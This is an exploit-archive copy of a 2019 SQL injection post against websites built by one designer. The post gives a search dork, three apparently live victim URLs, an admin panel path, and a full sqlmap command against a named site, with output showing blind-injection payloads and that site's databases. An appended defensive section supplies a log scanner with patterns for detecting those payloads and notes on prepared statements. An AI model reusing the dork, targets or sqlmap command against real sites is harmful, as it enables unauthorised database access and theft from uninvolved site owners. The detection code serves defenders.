Website designed & developed by designrz. SQL Injection vulnerability

CVE: (none listed)
Category: CWE-89
Price: Unknown
Severity: Unknown
Author: Unknown
Risk: Unknown
Exploitation Type: Remote
Date: 2019-07-07
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019070033

Below is a copy:

# Exploit Title: Website designed & developed by designrz. SQL Injection vulnerability
# Date: 07.07.2019
# Dork: inurl:.php?id= intext:website designed & developed by designrz.
# Exploit Author: H9xHacker
# Tested on: Linux

Reverse check bing.com

ip:170.10.164.63 .php?id= (This server contains 236 domains)

# Demo
iskconamritsar.com/programs2.php?id=11
admissionoverseas.com/book-appointment.php?id=41
dcmgroup.in/education.php?id=7

# Admin control panel path

site/com/cms/index.php

# PoC:
sqlmap.py --level=5 --risk=3 --timeout=10 --threads=10 --random-agent -u 'www.iskconamritsar.com/programs2.php?id=24' --no-cast --batch --dbs

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: id=-6246' OR 9878=9878-- cSiP

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=24' AND SLEEP(5)-- SiPf
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12
available databases [2]:
[*] information_schema
[*] iskconas_iskcon

----------------------------------
Greets:And All My Friends
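
For defenders, an added example that is not part of the original post: a small access-log check for the two techniques shown in the sqlmap output above (boolean-based and time-based blind injection in the `id` GET parameter). The log lines are constructed; the `/item.php` path and the documentation-range client addresses are assumptions, and the two injected requests carry the payloads quoted in the output above, URL-encoded.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (documentation IPs, hypothetical /item.php path).
SAMPLE_LOG = """\
192.0.2.10 - - [07/Jul/2019:10:00:01 +0000] "GET /item.php?id=24 HTTP/1.1" 200 5120
198.51.100.7 - - [07/Jul/2019:10:00:05 +0000] "GET /item.php?id=-6246%27%20OR%209878%3D9878--%20cSiP HTTP/1.1" 200 5120
198.51.100.7 - - [07/Jul/2019:10:00:09 +0000] "GET /item.php?id=24%27%20AND%20SLEEP%285%29--%20SiPf HTTP/1.1" 200 5120
192.0.2.33 - - [07/Jul/2019:10:01:00 +0000] "GET /item.php?id=abc HTTP/1.1" 404 310
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# "OR 9878=9878" style tautology: the same number on both sides of '='.
TAUTOLOGY_RE = re.compile(r"\b(?:OR|AND)\s+(\d+)\s*=\s*\1\b", re.I)
# MySQL delay primitives used for time-based blind probing.
DELAY_RE = re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I)


def classify_id(value):
    """Return None for a plain integer id, otherwise a finding label."""
    if re.fullmatch(r"[0-9]{1,10}", value):
        return None
    if DELAY_RE.search(value):
        return "time-based blind"
    if TAUTOLOGY_RE.search(value):
        return "boolean-based blind"
    return "non-numeric id"


def scan(log_text):
    """Return (client, path, label) for every request with a suspicious id."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        # parse_qs percent-decodes the value before it is classified.
        for value in parse_qs(parts.query, keep_blank_values=True).get("id", []):
            label = classify_id(value)
            if label:
                findings.append((client, parts.path, label))
    return findings


if __name__ == "__main__":
    for client, path, label in scan(SAMPLE_LOG):
        print(f"{client} {path}: {label}")
```

The same integer-only rule that `classify_id` applies to logs is the input check the affected pages are missing; binding `id` as a typed parameter in a prepared statement removes the injection point itself.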
